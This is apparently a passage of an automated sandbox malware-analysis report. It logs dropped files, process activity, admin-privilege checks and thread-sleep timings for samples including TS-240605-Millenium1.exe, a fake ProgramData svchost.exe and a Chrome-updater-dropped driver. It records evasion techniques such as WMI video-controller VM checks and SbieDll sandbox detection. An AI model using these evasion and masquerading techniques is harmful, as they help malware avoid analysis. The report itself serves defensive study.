Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\main.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB809E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\ProgramData\main.exe	Memory allocated: 25EB6300000 memory reserve \| memory write watch
Source: C:\ProgramData\main.exe	Memory allocated: 25ECFD20000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599844
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599558
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599406
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599275
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599094
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598950
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598837
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598656
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598498
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598370
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598234
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598103
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597984
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597874
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597746
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597629
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597468
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597148
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597031
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596918
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596783
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596656
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596505
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596375
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596249
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596131
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596011
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595902
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595781
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595672
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595562
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595453
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8554
Source: C:\ProgramData\main.exe	Window / User API: threadDelayed 3645
Source: C:\ProgramData\main.exe	Window / User API: threadDelayed 1349
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6634
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 504
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 2534
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 7465
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7225
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2450
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 7131

Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_queue.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_brotli.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_ctypes.pyd	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\gqxqtdeqxchk.sys	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\nacl\_sodium.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\ProgramData\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\python311.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\pyexpat.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_ssl.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\wrapt\_wrappers.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\select.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\python311.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\python310.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_pytransform.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_sqlite3.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\select.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\bcrypt\_bcrypt.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\ProgramData\setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\python310.dll	Jump to dropped file

Source: C:\ProgramData\Microsoft\hacn.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\ProgramData\Microsoft\based.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-17263

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	API coverage: 2.2 %
Source: C:\ProgramData\Microsoft\based.exe	API coverage: 9.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 8747 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 221 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep count: 8554 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep count: 183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3060	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -599844s >= -30000s
Source: C:\ProgramData\main.exe TID: 7912	Thread sleep count: 3645 > 30
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -599558s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -599406s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -599275s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -599094s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -598950s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -598837s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -598656s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -598498s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -598370s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -598234s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -598103s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -597984s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -597874s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -597746s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -597629s >= -30000s
Source: C:\ProgramData\main.exe TID: 7912	Thread sleep count: 1349 > 30
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -597468s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -597148s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -597031s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596918s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596783s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596656s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596505s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596375s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596249s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596131s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -596011s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -595902s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -595781s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -595672s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -595562s >= -30000s
Source: C:\ProgramData\main.exe TID: 7908	Thread sleep time: -595453s >= -30000s
Source: C:\ProgramData\main.exe TID: 7364	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\main.exe TID: 3272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 7928	Thread sleep count: 47 > 30
Source: C:\ProgramData\svchost.exe TID: 7928	Thread sleep time: -47000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep count: 6634 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep count: 504 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 8188	Thread sleep time: -36000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 2032	Thread sleep count: 38 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8176	Thread sleep count: 2534 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8176	Thread sleep time: -2534000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8176	Thread sleep count: 7465 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8176	Thread sleep time: -7465000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5720	Thread sleep count: 9928 > 30
Source: C:\Windows\System32\lsass.exe TID: 5720	Thread sleep time: -9928000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028	Thread sleep count: 7225 > 30
